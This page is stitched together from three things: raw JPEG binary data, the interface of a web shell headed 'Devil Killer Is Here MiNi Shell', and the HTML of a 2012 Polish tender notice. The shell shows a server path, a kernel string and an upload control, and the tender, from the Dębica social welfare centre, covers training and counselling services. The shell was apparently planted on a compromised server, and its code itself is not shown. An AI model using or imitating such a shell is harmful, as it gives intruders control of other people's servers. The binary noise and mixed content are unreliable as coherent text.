JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120514/152614-N-2012.html

<p class="kh_header"><b>Dębica: ORGANIZACJĘ I PRZEPROWADZENIE SZKOLEŃ BENEFICJENTÓW OSTATECZNYCH, WSPÓŁFINANSOWANYCH ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI, PODDZIAŁANIE 7.1.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ OŚRODKI POMOCY SPOŁECZNEJ</b><br>
<b>Numer ogłoszenia: 152614 - 2012; data zamieszczenia: 14.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Akademicka 12, 39-200 Dębica, woj. podkarpackie, tel. 0-14 6813590,6813591,6705006, faks 0-14 6705006.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops-debica.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ORGANIZACJĘ I PRZEPROWADZENIE SZKOLEŃ BENEFICJENTÓW OSTATECZNYCH, WSPÓŁFINANSOWANYCH ZE ŚRODKÓW EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI PRIORYTET VII PROMOCJA INTEGRACJI SPOŁECZNEJ, DZIAŁANIE 7.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI, PODDZIAŁANIE 7.1.1 ROZWÓJ I UPOWSZECHNIANIE AKTYWNEJ INTEGRACJI PRZEZ OŚRODKI POMOCY SPOŁECZNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń, współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2.Szkolenia są skierowane do osób zameldowanych w mieście Dębica, korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej, które nie pracują i są w wieku aktywności zawodowej.
3.Oznaczenie według Wspólnego Słownika Zamówień CPV: 80-50-00-00-9 Usługi szkoleniowe. 
4. Szczegółowy opis przedmiotu zamówienia:
4.1. Wyjazdowy, dwudniowy trening w zakresie kompetencji i umiejętności społecznych: 

4.1.1.Uczestnikami będzie 15 osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Dębicy, bezrobotnych, którzy nie pracują i są w wieku aktywności zawodowej, o niewielkim poczuciu własnej wartości, z niską samooceną, zameldowanych w mieście Dębica. Rekrutowanych przez Zamawiającego. 
4.1.2.Czas trwania 2 dni, w dniach od poniedziałku do piątku, nie mniej niż 16 godzin, tj. po 8 godzin dziennie, w odległości max. do 50 km od miasta Zamawiającego. 
4.1.3.Obejmuje następujący zakres:

1)Zdobycie wiedzy na temat pozytywnego myślenia na poziomie świadomym i podświadomym,
2)Rozwijanie własnej samooceny, wiary w siebie i pewności siebie,
3)Zdobycie wiedzy na temat korzyści z długofalowego planowania,
4)Budowanie aktywnej postawy, osoby wartościowej i wierzącej we własne możliwości,
5)Wzmocnienie i wsparcie psychiczne,
6)Integracja i wzajemne wsparcie w grupie,
7)Zwiększenie samodzielności w poszukiwaniu zatrudnienia na rynku pracy,
8)Metodyka prowadzenia zajęć do wyboru:
a)Warsztatowa, ćwiczenia,
b)w grupach,
c)burza mózgów,
d)wizualizacja,
e)mini wykłady, dyskusja, odgrywanie ról itp.

4.1.4.Wykonawca zobowiązany jest zapewnić i ponieść koszty: 

1)dojazdu do i z miejsca realizacji szkolenia, wyjazd i przyjazd z miejsca wskazanego przez Zamawiającego na terenie miasta Dębicy,
2)zapewnienia sal do zajęć,
3)1 nocleg, w pokojach 2os., 3 os. Każdy pokój z kompletem pościeli, pełnym węzłem sanitarnym, ręczniki, papier toaletowy,
4)4 ciepłe posiłki tj.: 2 obiady, 1 śniadanie, 1 kolację,
5)serwis kawowy podczas zajęć kawa, herbata, woda mineralna,
6)ubezpieczenie uczestników od następstw nieszczęśliwych wypadków,
7)zakupu materiałów do realizacji zajęć warsztatowych,
8)prowadzenia dokumentacji wykonanych usług zgodnie z zasadami dokumentowania działań wykonywanych w projektach finansowanych przez Europejski Fundusz Społeczny. 

4.1.5.Termin realizacji: sierpień - wrzesień 2012r.
4.1.6.Wymagania dla Wykonawcy w tym zakresie tj. osób prowadzących warsztaty:

1)Ukończony kurs trenera kontaktów interpersonalnych poświadczony certyfikatem bądź dyplomem bądź zaświadczeniem,
2)Doświadczenie w realizowaniu minimum 3 projektów unijnych obejmujących trening kształtowania umiejętności interpersonalnych i społecznych, potwierdzone referencjami, że zostały zrealizowane należycie.


4.2.Indywidualne poradnictwo zawodowe:

4.2.1.Uczestnikami będą osoby zameldowane w mieście Dębica, korzystające z pomocy Miejskiego Ośrodka Pomocy Społecznej, które nie pracują i są w wieku aktywności zawodowej, tj. około 50 osób, rekrutowanych przez Zamawiającego.
4.2.2.Cel: ocena indywidualnych preferencji i predyspozycji zawodowych uczestników, ukierunkowana na dobór szkoleń i kształcenia na lokalnym rynku pracy.
4.2.3.Indywidualne poradnictwo zawodowe świadczone będzie w godzinach pracy i w siedzibie Zamawiającego. 
4.2.4.Wykonawca zapewnia serwis kawowy oraz niezbędne materiały szkoleniowe i piśmiennicze.
4.2.5.Przewidywana liczba poradnictwa: 1 godzina na 1 uczestnika. Godzina poradnictwa wynosi 60 min.
4.2.6.Termin realizacji: czerwiec - listopad 2012r.
4.2.7.Wymagania dla doradcy zawodowego:

1)Doświadczenie w pracy z osobami bezrobotnymi i wykluczonymi zawodowo przez minimum 3 lata, potwierdzone referencjami, że zostały zrealizowane należycie,
2)Doradca zawodowy musi posiadać licencję zawodową minimum I stopnia lub studia podyplomowe w zakresie doradztwa zawodowego.


4.3.Indywidualne poradnictwo specjalistyczne:

4.3.1.Uczestnikami będą osoby zameldowane w mieście Dębica, korzystające z pomocy Miejskiego Ośrodka Pomocy Społecznej, które nie pracują i są w wieku aktywności zawodowej, tj. około 40 osób. 
4.3.2.Indywidualne poradnictwo ma być świadczone przez specjalistów tj.: psychologa, pedagoga, prawnika, terapeuty ds. uzależnień w godzinach pracy i siedzibie Zamawiającego. 
4.3.3.Godzina poradnictwa wynosi 60 min. Liczba godzin jest uzależniona od indywidualnych potrzeb uczestników. 
4.3.4.Wykonawca zapewnia serwis kawowy oraz materiały szkoleniowe.
4.3.5.Termin realizacji: od lipca do listopada 2012 roku.
4.3.6.Wymagania dla specjalistów:

1)Dyplom ukończenia studiów: pedagogicznych dot. pedagoga, prawniczych dot. prawnika, psychologa dot. psychologa lub inny dokument uprawniający do wykonywania ww. zawodu,
2)Świadectwo/dyplom ukończenia kursu terapii uzależnień.


4.4. Trzydniowa, wyjazdowa Szkoła dla rodziców:

4.4.1.Uczestnikami będzie 7 rodzin wraz z dziećmi tj. około 30 osób, rekrutowanych przez Zamawiającego. 
4.4.2.Trzydniowa, wyjazdowa Szkoła dla rodziców.
4.4.3.W odległości max. do 250 km od miasta Zamawiającego. 
4.4.4.Obejmuje następujący zakres:

1)rozpoznawanie, wyrażanie i akceptowanie uczuć,
2)aktywne słuchanie,
3)motywowanie dziecka do współdziałania, 
4)kształtowanie i doskonalenie umiejętności wychowawczych,
5)umiejętność patrzenia na świat oczami dziecka by pomóc rozwiązać konflikty,
6)modyfikowanie niepożądanych lub nieodpowiednich zachowań dziecka bez stosowania przemocy, 
7)poszukiwanie skutecznych sposobów dyscyplinowania dziecka (kara, pochwała),
8)wymierzanie kary a wyciąganie konsekwencji,
9)podejmowanie dialogu z dzieckiem i zachęcanie go do współpracy, aby uzyskać założone przez siebie cele,
10)stawianie i przestrzeganie czytelnych granic;
11)poznawanie i rozumienie uczuć dziecka,
12)zachęcanie do współpracy oraz rozwiązywanie problemów i konfliktów;
13)zachęcanie do samodzielności,
14)pogłębianie więzi rodzinnych.


4.4.5.Wykonawca zobowiązany jest zapewnić i ponieść koszty: 

1)dojazdu do i z miejsca realizacji zajęć (wyjazd i przyjazd z miejsca wskazanego przez Zamawiającego na terenie miasta Dębicy),
2)autobusu (musi posiadać aktualne badania techniczne), który pozostaje do stałej dyspozycji,
3)zapewnienia sal do zajęć,
4)2 noclegów w pokojach 2 os., 3 os. Każdy pokój z kompletem pościeli, pełnym węzłem sanitarnym, ręczniki, papier toaletowy,
5)ciepłe posiłki (tj.: 3 obiady, 2 śniadania, 2 kolacje) serwis kawowy podczas zajęć (kawa, herbata, woda mineralna, kanapki),
6)wynagrodzenia wykładowców, instruktorów, opiekunów,
7)ubezpieczenia uczestników od następstw nieszczęśliwych wypadków, 
8)zakupu materiałów merytorycznych, piśmienniczych i innych do realizacji zajęć warsztatowych zaopatrzonych logami udostępnionymi przez Zamawiającego według obowiązujących wytycznych,
9)sali konferencyjnej, która musi spełniać warunki BHP, wyposażona w: rzutnik, TV plazmowy lub ekran, laptop, flipchart, sprzęt nagłaśniający, multimedialny, bufet zawierający: kawę, herbatę, wodę mineralną, soki, ciasto konferencyjne i domowe,
10)prowadzenia dokumentacji wykonanych usług zgodnie z zasadami dokumentowania działań wykonywanych w projektach finansowanych przez Europejski Fundusz Społeczny. 
11)wydania zaświadczenia o ukończeniu szkoły dla rodziców
12)zajęć warsztatowych dla rodziców i dzieci,
13)animacji czasu wolnego dla dzieci,
14)integracji i animacji dla rodzin np.: wieczorek integracyjny lub ognisko i wycieczka.

4.4.6.Termin realizacji: lipiec - sierpień 2012r. (w dniach od poniedziałku do piątku). 
4.4.7.Wymagania dla Wykonawcy w tym zakresie:

1)Usługę tę będzie mógł świadczyć:
a)trener kontaktów interpersonalnych lub
b)psycholog lub
c)psychoterapeuta.
2)Doświadczenie w realizowaniu minimum 3 grup zajęciowych Szkoły dla rodziców, potwierdzone referencjami, że zostały zrealizowane należycie.


5.Poszczególne usługi Wykonawca realizuje dla wskazanej liczby uczestników, we wskazanej liczbie godzin oraz zgodnie z ustalonym przez Zamawiającego i Wykonawcę programem usług. 
6.Ponadto Wykonawca zobowiązany jest do:

1)Prowadzenia ewidencji obecności uczestników i bieżącego informowania Zamawiającego o każdej nieobecności lub rezygnacji z uczestnictwa. 
2)Uzyskania od uczestników potwierdzenia otrzymania materiałów szkoleniowych przy każdej usłudze, cateringu i noclegu (przy warsztatach wyjazdowych), odrębnie dla każdej usługi. 
3)Wydania uczestnikom stosownego zaświadczenia o ukończeniu treningu w zakresie kompetencji i umiejętności społecznych oraz Szkoły dla rodziców.
4)Zawiadomienia Zamawiającego w razie braku możliwości wykonania przedmiotu umowy. 
5)Zawiadomienia Zamawiającego o zakończeniu szkolenia i przekazania w terminie do 7 dni od ukończenia szkolenia zestawienia dokumentów tj.: 
a) listy obecności,
b) 1 egz. zaświadczenia, świadectwa lub certyfikatu o ukończonych warsztatach,
c) potwierdzenie odbioru materiałów szkoleniowych przez uczestników,
d) płyty CD wraz ze zdjęciami wykonanymi z każdej usługi.

6)Przekazania dokumentów świadczących o zakresie oraz wymiarze wykonanych działań. 
7)Umieszczenia informacji o realizowanym szkoleniu na stronie internetowej www.inwestycjewkadry.info.pl. 
8)Oznaczenia: pomieszczeń, w których odbywają się warsztaty, zajęcia, materiałów szkoleniowych oraz wszelkich innych dokumentów materiałami otrzymanymi od Zamawiającego. 
9)Podpisania umowy powierzenia danych osobowych uczestników.
10)Podpisania protokołu odbioru zamówienia.
11)Umożliwienia kontroli realizacji niniejszej umowy na żądanie upoważnionej instytucji (np. Wojewódzkiego Urzędu Pracy).
12)Stosowania się do pisemnych poleceń i wskazówek Zamawiającego w trakcie wykonywania przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna oświadczenie złożone przez Wykonawcę, że posiada uprawnienia do wykonywania wymaganej przez Zamawiającego działalności.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana przez zamawiającego na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty:

a)wykaz osób, które będą uczestniczyły w wykonaniu zamówienia i spełniają wymagania Zamawiającego w zakresie wiedzy i doświadczenia, o których mowa w Rozdziale IV SIWZ oraz 
b)wykaz wykonanych lub wykonywanych usług z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz założeniem dokumentu potwierdzającego, że zostały wykonane lub wykonywane należycie, zgodnie z wymogami zawartymi w Rozdziale IV SIWZ.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana przez zamawiającego na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: oświadczenie, iż na czas realizacji przedmiotu zamówienia dysponuje odpowiednimi pomieszczeniami.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana przez zamawiającego na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączony do oferty: wykaz osób, które będą uczestniczyły w wykonaniu zamówienia oraz oświadczenie, iż posiadają wymagane przez Zamawiającego uprawnienia.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana przez zamawiającego na zasadzie spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający za spełnienie niniejszego warunku uzna dołączone do oferty oświadczenie Wykonawcy, iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana przez zamawiającego na zasadzie spełnia lub nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Rekomendacje bądź referencje bądź inny dokument potwierdzający, że usługi były lub są wykonywane należycie.
2. Zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wydane zgodnie z art. 20 ust. 4 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69 poz. 415 ze zm.).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie wykonawcy - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w zakresie: zmiany ilości godzin usług świadczonych przez specjalistów w zależności od potrzeb uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops-debica.pl<br>
